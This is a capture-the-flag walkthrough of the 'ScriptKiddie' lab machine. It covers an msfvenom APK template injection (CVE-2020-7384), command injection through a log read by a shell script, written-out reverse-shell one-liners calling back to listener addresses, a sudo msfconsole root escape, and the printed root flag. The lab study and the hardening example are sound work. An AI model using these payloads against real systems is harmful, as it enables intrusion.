ScriptKiddie

Recce
$ sudo nmap -p- -T4 -A 10.10.10.226
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 13:56 EDT
Nmap scan report for 10.10.10.226
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

$ nikto -h http://10.10.10.226:5000
Server: Werkzeug/0.16.1 Python/3.8.5
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
Allowed HTTP Methods: HEAD, POST, OPTIONS, GET
7865 requests: 0 error(s) and 4 item(s) reported on remote host

$ dirb http://10.10.10.226:5000
---- Scanning URL: http://10.10.10.226:5000/ ----
-----------------
$ searchsploit Werkzeug
Werkzeug - 'Debug Shell' Command Execution              | multiple/remote/43905.py
Werkzeug - Debug Shell Command Execution (Metasploit)   | python/remote/37814.rb

PyWerkzeug-Debug-Command-Execution-master.zip
Werkzeug-Debug-RCE-master.zip

The web app on port 5000 (k1d'5 h4ck3r t00l5) wraps three tools: Nmap, MsfVenom and Searchsploit. The MsfVenom form takes an optional APK template upload, and that upload is the attack surface used below.

Vuln (nudged, not figured out):
Rapid7 Metasploit MsfVenom APK template command injection, CVE-2020-7384. msfvenom trusts the uploaded APK template, so a crafted template runs commands on the box as whatever user the Flask app runs as.
https://www.exploit-db.com/exploits/49491

Method:
1. Generate the malicious APK template with the Metasploit module.
2. Start a listener on the port the injected command calls back to (4444 here).
3. Upload the template through the MsfVenom form and trigger generation.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set TARGET 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.109
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk
$ cp ~/.msf4/local/msf.apk .

Check: LHOST is the address baked into the template's injected command, so it must be your current VPN address and must match the box the listener runs on. The session below received the callback on 10.10.14.149; if your address changed since generating the APK, set LHOST again and re-run exploit.

htb/machines/ScriptKiddie226$ nc -lvnp 4444
listening on [any] 4444 ...

Go to http://10.10.10.226:5000/ and upload the payload:
Payloads
venom it up - gen rev tcp meterpreter bins
os: android
lhosts: 10.10.14.149
template file: msf.apk
click the generate button

Back at nc on 4444 a shell arrives as the web app's user, kid. Upgrade it to a pty before doing anything else:
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.226] 60538
python3 -c "import pty; pty.spawn('/bin/bash')"
bash-5.0$ cat user.txt


The interesting entries in /etc/passwd:
cat /etc/passwd
kid:x:1000:1000:kid:/home/kid:/bin/bash
pwn:x:1001:1001::/home/pwn:/bin/bash

The script that consumes kid's log, scanlosers.sh (it runs as pwn, which is the user the shell below comes back as):
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The bug: each log line has its first two space-separated fields dropped, the remainder is read into ip, and ip is spliced unquoted into a string that a second sh -c re-parses. Nothing checks that ip is an address, so a log line whose third field onward is ";<command> #" runs the command as pwn from /home/pwn. kid can write the log (see the permissions below), and the script empties the log after each run, so every attempt has to be appended fresh.
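The injection in scanlosers.sh, as an added shell example that is not code from the box or from this writeup: it models the cut | read extraction and the exact string the script hands to sh -c, then shows a hardened variant that validates the value and passes it as one argument. The log lines in it are constructed, and safe_scan is a dry run that prints the argv it would execute instead of calling nmap.

```shell
#!/bin/sh
# Added example, not code from the box: a model of the line handling in
# scanlosers.sh next to a hardened version. Log lines used with it are constructed.

# What the script's pipeline turns one log line into: `cut` drops the first
# two space-separated fields, then `read` strips surrounding whitespace.
# A line that starts with two spaces therefore puts attacker text in ${ip}.
extract_ip() {
    printf '%s\n' "$1" | cut -d' ' -f3- | while read ip; do printf '%s' "$ip"; done
}

# The string the original script hands to `sh -c` for that value.
# The second shell re-parses it, so ';' and '#' inside ${ip} become syntax.
vulnerable_cmd() {
    printf '%s' "nmap --top-ports 10 -oN recon/$1.nmap $1 2>&1 >/dev/null"
}

# Hardened check: accept only four dotted decimal octets, each 0-255.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*|'') return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Hardened scan: validate, then pass the value as a single argv element so
# no shell ever re-parses it. Dry run: prints the argv one element per line
# instead of invoking nmap.
safe_scan() {
    is_ipv4 "$1" || { printf 'rejected: %s\n' "$1" >&2; return 1; }
    printf '%s\n' nmap --top-ports 10 -oN "recon/$1.nmap" "$1"
}

# Demonstration on a constructed benign entry and on the injection shape used
# on this box (two leading spaces, then ";command #").
demo() {
    for line in '[2021-04-13 14:00:00] 10.10.10.226' '  ;id #'; do
        ip=$(extract_ip "$line")
        printf 'ip=<%s>\n' "$ip"
        printf 'sh -c would get: %s\n' "$(vulnerable_cmd "$ip")"
        safe_scan "$ip" || true
    done
}
```

Run demo to see both lines side by side: the benign entry yields a dotted quad that both paths accept, while the injected entry becomes a command string containing ";id #" for the original script and is rejected before anything is executed in the hardened one.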

kid@scriptkiddie:~/logs$ cat hackers
test ; ;bash -c 'cat /tmp/backpipe|/bin/bash -i 2>&1|nc 10.10.14.2 9009 >/tmp/backpipe #
kid@scriptkiddie:~/logs$ ls -l
total 0
-rw-rw-r-- 1 kid pwn 0 May 11 13:37 hackers

The first line is another player's leftover reverse-shell payload. The log is owned by kid with group pwn, so kid can append to it and pwn's script can read it.

flask.service process tree (app.py is what the first shell landed in):
│ ├─   897 /usr/bin/python3 /home/kid/html/app.py
│ ├─  2018 /bin/sh
│ ├─  2316 python3 -c import pty; pty.spawn("/bin/sh")
│ ├─  2317 /bin/sh

First attempt: the listener got a connection that died immediately:
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.226] 38450
-bash: 1’: ambiguous redirect

The trailing ’ in the error message is the giveaway: the echoed payload used typographic quotes, so bash on the box saw 0>&1’ as a redirect to something called 1’ rather than to fd 1. The >& /dev/tcp redirection had already opened the socket, which is why nc saw a connection before bash gave up. Use plain ASCII quotes, and keep the two leading spaces so the command lands in field 3 of the log line, which is where the script starts reading:

/home/kid/logs$ echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.133/1234 0>&1' #" >> hackers    # note the two leading spaces
kali@kali:~/0.htb/machines/ScriptKiddie226$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.226] 45592
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ ls -la .ssh
drwx------ 2 pwn  pwn  4096 Feb 10 16:10 .
drwxr-xr-x 6 pwn  pwn  4096 May 11 13:06 ..
-rw-r--r-- 1 root root    0 Feb 10 16:10 authorized_keys

authorized_keys is root-owned and empty, so planting a key for pwn is not an option; check sudo instead.


pwn@scriptkiddie:~/.ssh$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

msfconsole passes anything it does not recognise as a console command straight to the system shell (the [*] exec: line below), so running it as root with NOPASSWD is a root shell:
pwn@scriptkiddie:/opt/metasploit-framework-6.0.9$ sudo ./msfconsole

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

stty: 'standard input': Inappropriate ioctl for device
msf6 > /bin/bash
[*] exec: /bin/bash

whoami
root
cd /root
ls
root.txt
snap
cat root.txt
53eac4a4e5b67d5b074259151271d6e4